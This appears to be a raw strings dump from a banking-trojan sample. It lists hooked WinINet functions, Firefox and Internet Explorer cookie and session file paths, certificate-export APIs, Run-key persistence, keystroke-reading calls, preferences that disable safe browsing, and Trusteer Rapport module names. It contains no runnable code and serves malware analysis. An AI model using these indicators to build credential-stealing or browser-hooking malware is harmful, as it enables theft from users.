HTTP_QUERY_UPGRADE
HTTP_QUERY_UPGRADE
HTTP_QUERY_TRANSFER_ENCODING
HTTP_QUERY_TRANSFER_ENCODING
HTTP_QUERY_RANGE
HTTP_QUERY_RANGE
HTTP_QUERY_PROXY_AUTHORIZATION
HTTP_QUERY_PROXY_AUTHORIZATION
HTTP_QUERY_MAX_FORWARDS
HTTP_QUERY_MAX_FORWARDS
HTTP_QUERY_IF_UNMODIFIED_SINCE
HTTP_QUERY_IF_UNMODIFIED_SINCE
HTTP_QUERY_IF_RANGE
HTTP_QUERY_IF_RANGE
HTTP_QUERY_IF_NONE_MATCH
HTTP_QUERY_IF_NONE_MATCH
HTTP_QUERY_IF_MATCH
HTTP_QUERY_IF_MATCH
HTTP_QUERY_HOST
HTTP_QUERY_HOST
HTTP_QUERY_ETAG
HTTP_QUERY_ETAG
HTTP_QUERY_CONTENT_RANGE
HTTP_QUERY_CONTENT_RANGE
HTTP_QUERY_CONTENT_MD5
HTTP_QUERY_CONTENT_MD5
HTTP_QUERY_CONTENT_LOCATION
HTTP_QUERY_CONTENT_LOCATION
HTTP_QUERY_CONTENT_BASE
HTTP_QUERY_CONTENT_BASE
HTTP_QUERY_CACHE_CONTROL
HTTP_QUERY_CACHE_CONTROL
HTTP_QUERY_AGE
HTTP_QUERY_AGE
HTTP_QUERY_CONTENT_DISPOSITION
HTTP_QUERY_CONTENT_DISPOSITION
HTTP_QUERY_REFRESH
HTTP_QUERY_REFRESH
HTTP_QUERY_REQUEST_METHOD
HTTP_QUERY_REQUEST_METHOD
HTTP_QUERY_COOKIE
HTTP_QUERY_COOKIE
HTTP_QUERY_SET_COOKIE
HTTP_QUERY_SET_COOKIE
HTTP_QUERY_ACCEPT_RANGES
HTTP_QUERY_ACCEPT_RANGES
HTTP_QUERY_PROXY_AUTHENTICATE
HTTP_QUERY_PROXY_AUTHENTICATE
HTTP_QUERY_WWW_AUTHENTICATE
HTTP_QUERY_WWW_AUTHENTICATE
HTTP_QUERY_USER_AGENT
HTTP_QUERY_USER_AGENT
HTTP_QUERY_TITLE
HTTP_QUERY_TITLE
HTTP_QUERY_SERVER
HTTP_QUERY_SERVER
HTTP_QUERY_RETRY_AFTER
HTTP_QUERY_RETRY_AFTER
HTTP_QUERY_REFERER
HTTP_QUERY_REFERER
HTTP_QUERY_ORIG_URI
HTTP_QUERY_ORIG_URI
HTTP_QUERY_LOCATION
HTTP_QUERY_LOCATION
HTTP_QUERY_IF_MODIFIED_SINCE
HTTP_QUERY_IF_MODIFIED_SINCE
HTTP_QUERY_FROM
HTTP_QUERY_FROM
HTTP_QUERY_FORWARDED
HTTP_QUERY_FORWARDED
HTTP_QUERY_CONTENT_ENCODING
HTTP_QUERY_CONTENT_ENCODING
HTTP_QUERY_AUTHORIZATION
HTTP_QUERY_AUTHORIZATION
HTTP_QUERY_ACCEPT_LANGUAGE
HTTP_QUERY_ACCEPT_LANGUAGE
HTTP_QUERY_ACCEPT_ENCODING
HTTP_QUERY_ACCEPT_ENCODING
HTTP_QUERY_ACCEPT_CHARSET
HTTP_QUERY_ACCEPT_CHARSET
HTTP_QUERY_ACCEPT
HTTP_QUERY_ACCEPT
HTTP_QUERY_CONNECTION
HTTP_QUERY_CONNECTION
HTTP_QUERY_RAW_HEADERS_CRLF
HTTP_QUERY_RAW_HEADERS_CRLF
HTTP_QUERY_RAW_HEADERS
HTTP_QUERY_RAW_HEADERS
HTTP_QUERY_STATUS_TEXT
HTTP_QUERY_STATUS_TEXT
HTTP_QUERY_STATUS_CODE
HTTP_QUERY_STATUS_CODE
HTTP_QUERY_VERSION
HTTP_QUERY_VERSION
HTTP_QUERY_PRAGMA
HTTP_QUERY_PRAGMA
HTTP_QUERY_LINK
HTTP_QUERY_LINK
HTTP_QUERY_COST
HTTP_QUERY_COST
HTTP_QUERY_DERIVED_FROM
HTTP_QUERY_DERIVED_FROM
HTTP_QUERY_URI
HTTP_QUERY_URI
HTTP_QUERY_MESSAGE_ID
HTTP_QUERY_MESSAGE_ID
HTTP_QUERY_LAST_MODIFIED
HTTP_QUERY_LAST_MODIFIED
HTTP_QUERY_EXPIRES
HTTP_QUERY_EXPIRES
HTTP_QUERY_DATE
HTTP_QUERY_DATE
HTTP_QUERY_PUBLIC
HTTP_QUERY_PUBLIC
HTTP_QUERY_ALLOW
HTTP_QUERY_ALLOW
HTTP_QUERY_CONTENT_LANGUAGE
HTTP_QUERY_CONTENT_LANGUAGE
HTTP_QUERY_CONTENT_LENGTH
HTTP_QUERY_CONTENT_LENGTH
HTTP_QUERY_CONTENT_DESCRIPTION
HTTP_QUERY_CONTENT_DESCRIPTION
HTTP_QUERY_CONTENT_ID
HTTP_QUERY_CONTENT_ID
HTTP_QUERY_CONTENT_TRANSFER_ENCODING
HTTP_QUERY_CONTENT_TRANSFER_ENCODING
HTTP_QUERY_CONTENT_TYPE
HTTP_QUERY_CONTENT_TYPE
HTTP_QUERY_MIME_VERSION
HTTP_QUERY_MIME_VERSION
Content-Length: %u
Content-Length: %u
HTTP/
HTTP/
SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
\\.\pipe\globpluginsuninstallpipe
\\.\pipe\globpluginsuninstallpipe
cookies-nontor.xml
cookies-nontor.xml
cookies.txt
cookies.txt
sessionstore.js
sessionstore.js
sessionstore.bak
sessionstore.bak
cookies.sqlite-journal
cookies.sqlite-journal
cookies.sqlite
cookies.sqlite
GdiplusShutdown
GdiplusShutdown
gdiplus.dll
gdiplus.dll
\\.\pipe\processingpipe_
\\.\pipe\processingpipe_
services.exe
services.exe
csrss.exe
csrss.exe
smss.exe
smss.exe
\\.\pipe\globpluginspipe
\\.\pipe\globpluginspipe
X X
X X
user_pref("browser.safebrowsing.enabled", false);
user_pref("browser.safebrowsing.enabled", false);
user_pref("browser.safebrowsing.malware.enabled", false);
user_pref("browser.safebrowsing.malware.enabled", false);
user_pref("security.warn_entering_weak", false);
user_pref("security.warn_entering_weak", false);
user_pref("security.warn_entering_weak.show_once", false);
user_pref("security.warn_entering_weak.show_once", false);
user_pref("security.warn_viewing_mixed", false);
user_pref("security.warn_viewing_mixed", false);
user_pref("security.warn_viewing_mixed.show_once", false);
user_pref("security.warn_viewing_mixed.show_once", false);
user_pref("privacy.clearOnShutdown.cookies", false);
user_pref("privacy.clearOnShutdown.cookies", false);
user_pref("privacy.clearOnShutdown.sessions", false);
user_pref("privacy.clearOnShutdown.sessions", false);
/Mozilla/Firefox/profiles.ini
/Mozilla/Firefox/profiles.ini
/Mozilla/Firefox/
/Mozilla/Firefox/
nspr4.dll
nspr4.dll
seieapiXX
seieapiXX
%s\Content.IE5\0
%s\Content.IE5\0
%s\Content.IE5\%s
%s\Content.IE5\%s
\Content.IE5\*.*
\Content.IE5\*.*
set_url
set_url
PFXImportCertStore
PFXImportCertStore
user32.dll
user32.dll
%d.%d.%d
%d.%d.%d
keys
keys
http:
http:
urlmask
urlmask
cert
cert
%s%s%s
%s%s%s
[ERROR] : CreateProcess("%s", ..., "%s") fails : dwFileSize == 0xX; dwCrc32 == 0xX : dwErr == %d
[ERROR] : CreateProcess("%s", ..., "%s") fails : dwFileSize == 0xX; dwCrc32 == 0xX : dwErr == %d
[ERROR] : DumpPage("%s", "%s") fails : dwErr == %d
[ERROR] : DumpPage("%s", "%s") fails : dwErr == %d
[ERROR] : Empty szLink? : dwErr == %d
[ERROR] : Empty szLink? : dwErr == %d
[ERROR] : Empty report. Unknown error : dwErr == %d
[ERROR] : Empty report. Unknown error : dwErr == %d
[ERROR] : Thread is really sloppy : dwErr == %d
[ERROR] : Thread is really sloppy : dwErr == %d
[ERROR] : Cannot create thread. 0o : dwErr == %d
[ERROR] : Cannot create thread. 0o : dwErr == %d
%d-%d-%d
%d-%d-%d
collectors.txt
collectors.txt
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\%d
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\%d
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d
ProxyHttp1.1
ProxyHttp1.1
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
EnableHttp1_1
EnableHttp1_1
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
hXXp://
hXXp://
hXXps://
hXXps://
HTTP/1.
HTTP/1.
.mpeg
.mpeg
.jpeg
.jpeg
%s&tid=%s&%s
%s&tid=%s&%s
TakeBotExeMd5Callback
TakeBotExeMd5Callback
TakeOriginal_HttpSendRequestW
TakeOriginal_HttpSendRequestW
TakeOriginal_HttpSendRequestA
TakeOriginal_HttpSendRequestA
TakeOriginal_HttpOpenRequestA
TakeOriginal_HttpOpenRequestA
TakeOriginal_HttpAddRequestHeadersA
TakeOriginal_HttpAddRequestHeadersA
Callback_OnBeforeProcessUrl
Callback_OnBeforeProcessUrl
HttpQueryInfoA
HttpQueryInfoA
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestA
wlcomm.exe
wlcomm.exe
msmsgs.exe
msmsgs.exe
msnmsgr.exe
msnmsgr.exe
PR_OpenTCPSocket
PR_OpenTCPSocket
kernel32.dll
kernel32.dll
Crypt32.dll
Crypt32.dll
Advapi32.dll
Advapi32.dll
ws2_32.dll
ws2_32.dll
wininet.dll
wininet.dll
Ht.Ht!HHt
Ht.Ht!HHt
w SSh
w SSh
SSSSh
SSSSh
t.VPW
t.VPW
%System%\WININET.dll
%System%\WININET.dll
C:\trivax1.Bin\config.bin
C:\trivax1.Bin\config.bin
%System%\ntdll.dll
%System%\ntdll.dll
%System%\USER32.dll
%System%\USER32.dll
%System%\CRYPT32.dll
%System%\CRYPT32.dll
C:\trivax1.Bin\trivax1.Bin.exe
C:\trivax1.Bin\trivax1.Bin.exe
C:\trivax1.Bin\
C:\trivax1.Bin\
trivax1.Bin.exe
trivax1.Bin.exe
config.bin
config.bin
o0Iu6US.exe
o0Iu6US.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
5.1.2600!XP7!A8A67A25
5.1.2600!XP7!A8A67A25
trivax1.Bin
trivax1.Bin
Microsoft Windows
Microsoft Windows
%System%\ADVAPI32.dll
%System%\ADVAPI32.dll
%System%\WS2_32.dll
%System%\WS2_32.dll
PFXExportCertStoreEx
PFXExportCertStoreEx
CertCloseStore
CertCloseStore
CertAddCertificateContextToStore
CertAddCertificateContextToStore
CertOpenStore
CertOpenStore
CertGetCertificateContextProperty
CertGetCertificateContextProperty
CertDeleteCertificateFromStore
CertDeleteCertificateFromStore
CertDuplicateCertificateContext
CertDuplicateCertificateContext
CertNameToStrA
CertNameToStrA
CertEnumCertificatesInStore
CertEnumCertificatesInStore
CertOpenSystemStoreA
CertOpenSystemStoreA
CRYPT32.dll
CRYPT32.dll
ntdll.dll
ntdll.dll
WS2_32.dll
WS2_32.dll
FindCloseUrlCache
FindCloseUrlCache
FindNextUrlCacheEntryA
FindNextUrlCacheEntryA
DeleteUrlCacheEntry
DeleteUrlCacheEntry
FindFirstUrlCacheEntryA
FindFirstUrlCacheEntryA
InternetCrackUrlA
InternetCrackUrlA
InternetCanonicalizeUrlA
InternetCanonicalizeUrlA
GetUrlCacheEntryInfoW
GetUrlCacheEntryInfoW
WININET.dll
WININET.dll
SHLWAPI.dll
SHLWAPI.dll
GetProcessHeap
GetProcessHeap
DisconnectNamedPipe
DisconnectNamedPipe
ConnectNamedPipe
ConnectNamedPipe
CreateNamedPipeA
CreateNamedPipeA
WaitNamedPipeA
WaitNamedPipeA
KERNEL32.dll
KERNEL32.dll
GetKeyboardState
GetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
EnumWindows
EnumWindows
GetKeyState
GetKeyState
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
RegCloseKey
RegCloseKey
RegCreateKeyExA
RegCreateKeyExA
RegOpenKeyExA
RegOpenKeyExA
CryptDestroyKey
CryptDestroyKey
CryptGetKeyParam
CryptGetKeyParam
CryptGetUserKey
CryptGetUserKey
ADVAPI32.dll
ADVAPI32.dll
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
3-33383|3
3-33383|3
6"6(6-676
6"6(6-676
RapportUtil.
RapportUtil.
(GMT %su:u) %s
(GMT %su:u) %s
\prefs.js
\prefs.js
RapportTanzan36.
RapportTanzan36.
RapportKoan.
RapportKoan.